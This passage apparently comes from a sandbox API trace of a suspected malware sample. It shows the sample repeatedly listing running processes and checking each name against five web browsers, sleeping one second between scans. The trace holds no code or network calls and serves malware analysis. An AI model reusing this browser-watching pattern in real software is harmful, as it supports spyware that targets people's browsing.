th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0254.947] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0254.947] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0254.947] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0254.947] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0254.947] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.947] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0254.948] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0254.948] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0254.948] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0254.948] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0254.948] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.948] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0254.948] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0254.948] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0254.949] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0254.949] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0254.949] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.949] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0254.949] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0254.949] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0254.949] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0254.949] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0254.949] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.949] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0254.950] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0254.950] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0254.950] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0254.950] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0254.950] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.950] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0254.950] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0254.950] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0254.950] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0254.950] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0254.950] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.950] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0254.951] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0254.951] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0254.951] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0254.951] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0254.951] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.951] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0254.951] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0254.951] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0254.951] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0254.951] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0254.951] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.952] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0254.952] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0254.952] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0254.952] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0254.952] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0254.952] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.952] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0254.953] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0254.953] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0254.953] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0254.953] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0254.953] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.953] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0254.953] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0254.953] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0254.953] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0254.953] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0254.953] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.953] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0254.954] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0254.954] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0254.954] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0254.954] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0254.954] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.954] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0254.954] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0254.954] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0254.954] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0254.954] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0254.954] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.954] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0254.955] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0254.955] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0254.955] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0254.955] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0254.955] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.955] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0254.955] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0254.955] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0254.956] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0254.956] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0254.956] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.956] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0254.956] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0254.956] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0254.956] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0254.956] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0254.956] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.956] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0254.957] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0254.957] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0254.957] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0254.957] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0254.957] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.957] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.957] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0254.957] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0254.957] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.957] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0254.957] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.957] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0254.958] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0254.958] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0254.958] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0254.958] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0254.958] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.958] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.958] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0254.958] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0254.958] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.958] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0254.959] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.959] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0254.959] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0254.959] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0254.959] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0254.959] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0254.959] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.959] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0254.960] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0254.960] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0254.960] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0254.960] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0254.960] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.960] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0254.960] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0254.960] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0254.960] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0254.960] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0254.960] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.960] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0254.961] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0254.961] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0254.961] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0254.961] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0254.961] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.961] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0254.961] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0254.961] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0254.961] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0254.962] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0254.962] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.962] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0254.962] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0254.962] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0254.962] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0254.962] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0254.962] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.962] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0254.963] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0254.963] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0254.963] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0254.963] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0254.963] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.963] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0254.963] CloseHandle (hObject=0xe8) returned 1 [0254.963] Sleep (dwMilliseconds=0x3e8) [0255.982] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0255.984] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.984] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0255.984] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0255.984] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0255.984] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0255.984] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0255.984] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0255.985] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0255.985] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0255.985] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0255.985] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0255.985] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0255.985] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0255.985] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0255.985] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0255.985] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0255.985] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0255.985] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.985] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0255.986] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0255.986] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0255.986] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0255.986] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0255.986] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0255.986] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0255.986] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0255.987] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0255.987] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0255.987] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0255.987] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.987] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0255.987] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0255.987] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0255.987] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0255.987] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0255.987] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0255.987] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0255.988] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0255.988] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0255.988] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0255.988] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0255.988] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.988] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0255.988] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0255.988] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0255.988] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0255.988] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0255.988] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0255.988] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0255.989] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0255.989] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0255.989] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0255.989] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0255.989] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0255.989] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0255.990] lstrcmpiA 